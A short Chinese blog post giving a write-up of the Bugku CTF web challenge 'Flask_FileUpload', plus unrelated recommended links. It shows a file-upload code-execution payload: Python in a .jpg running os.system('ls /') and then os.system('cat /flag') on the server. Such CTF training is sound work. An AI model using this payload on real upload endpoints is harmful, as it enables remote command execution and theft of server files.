Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
UpgradeLink几秒前
Electron项目使用electron-updater与UpgradeLink接入参考
开发语言·前端·javascript·笔记·electron·用户运营
cvyoutian6 分钟前
PyTorch 多卡训练常见坑:设置 CUDA_VISIBLE_DEVICES 后仍 OOM 在 GPU 0 的解决之道
人工智能·pytorch·python
Cat God 0078 分钟前
CentOS 搭建 SFTP 服务器(三)
服务器·python·centos
程序员祥云9 分钟前
技能特⻓回答
前端·面试
lubiii_12 分钟前
网络安全需掌握的专业术语解析
安全·web安全·网络安全
周杰伦_Jay12 分钟前
【后端开发语言对比】Java、Python、Go语言对比及开发框架全解析
java·python·golang
xiaoxue..12 分钟前
React 新手村通关指南:状态、组件与魔法 UI
前端·javascript·react.js·ui
咖啡の猫14 分钟前
Python列表推导式
开发语言·python
计算机毕设指导615 分钟前
基于微信小程序的网络安全知识科普平台系统【源码文末联系】
java·spring boot·安全·web安全·微信小程序·小程序·tomcat
2501_9216494915 分钟前
外汇与贵金属行情 API 集成指南:WebSocket 与 REST 调用实践
网络·后端·python·websocket·网络协议·金融
热门推荐
01GitHub 镜像站点02【AutoGLM部署】本地私有化部署AI手机Agent03UV安装并设置国内源04【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)05Open-AutoGLM Windows 安装部署教程06Linux下V2Ray安装配置指南07BongoCat - 跨平台键盘猫动画工具08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser10Windows 11 官方系统安装与重装完整教程(2025年最新版)